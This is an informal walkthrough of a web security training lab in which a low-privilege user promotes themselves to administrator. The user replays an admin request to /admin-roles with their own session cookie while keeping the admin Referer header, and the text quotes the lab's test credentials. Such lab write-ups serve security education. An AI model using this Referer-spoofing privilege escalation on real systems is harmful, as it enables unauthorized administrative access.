This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
This Lab is so easy First login with administrator and upgrade Carlos
Go to request → GET /my-account?id=wiener Copy session for wiener
do not change anything in this request because Referer check if the request come from admin page or not
if Come From any page he blocked it
so After copy session Go to the request with GET /admin-roles?useraname=carlos&action=upgrade
just paste wiener session and change username from carlos → wiener
and if you notice you will see the referer com from admin page because this already Admin Request
click on follow redirection and Congrats You solved the lab 🎉
